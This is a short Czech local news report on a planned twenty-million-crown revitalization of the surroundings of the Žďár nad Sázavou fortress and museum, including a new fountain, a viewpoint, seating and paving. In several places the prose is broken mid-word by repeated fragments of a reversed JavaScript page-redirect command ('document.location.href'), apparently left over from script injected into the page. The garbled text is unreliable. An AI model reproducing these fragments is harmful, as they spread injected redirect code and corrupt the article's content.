Rainbow page separator

Okolí tvrze čeká revitalizace, přibude i kašna či vyhlídka

Pondělí, 23. prosince 2019

Žďár nad Sázavou / Okolí his[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torické budovy tvrze, ve které sídlí Regionální muzeum města Žďáru nad Sázavou, čeká v příštím roce revitalizace. Vyjít by měla na zhruba dvacet milionů korun, realizaci projektu uhradí měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to. Obnova se dotkne nejenom prostranství před muzeem, ale i okolních úzkých uliček, zákoutí a schodišť včetně těsného okolí kostela svatého Prokopa.
Přímo u kostela vznikne posezení, přibude tam strom i nová kašna, obnova čeká rovněž zeleň a dlažbu před sva[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tostánkem. Před Moučkovým domem je naplánováno zřízení odpočinkového místa s vyhlídkou na park ve Farských humnech a nová plastika trubače.
U muzea dojde k úpravě stávajícího nepřehledného parkování, odborné ošetření čeká tamní lípu, která bude navíc opatřena kruhovým posezením kolem kmene. V celé oblasti kromě nové dlažby přibude nejenom další zeleň, ale i nový mobiliář ladící s mobiliářem na náměstí.